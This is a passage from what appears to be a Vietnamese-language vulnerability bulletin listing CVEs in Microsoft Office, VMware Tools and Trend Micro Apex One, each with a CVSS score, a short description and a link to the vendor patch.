Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft Office 2019 for Mac
Microsoft Office 2019 for 64-bit editions
Microsoft Office 2019 for 32-bit editions
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37962
3.2 Ứng dụng web và các sản phẩm khác
3.2.1 CVE-2022-31676 – Local privilege escalation vulnerability
CVSS v3: 7.0/10
Mô tả: Vmware Tools tồn tại lổ hỗng cho phép kẻ tấn công leo thang đặc quyền lên quyền root
Sản phẩm ảnh hưởng: Vmware Tools
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://www.vmware.com/security/advisories/VMSA-2022-0024.html
3.2.2 CVE-2022-40139: Improper Validation of Rollback Mechanism Components RCE Vulnerability
CVSS v3: 7.2/10
Mô tả: Lỗ hổng tồn tại trong quá trình xác thực một số thành phần trong cơ chế rollback. Kẻ tấn công có thể tải xuống các rollback package độc hại dẫn tới thực thi mã từ xa
Sản phẩm ảnh hưởng: Trend Micro Apex One và Trend Micro Apex One as a Service
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://success.trendmicro.com/dcx/s/solution/000291528?language=en_US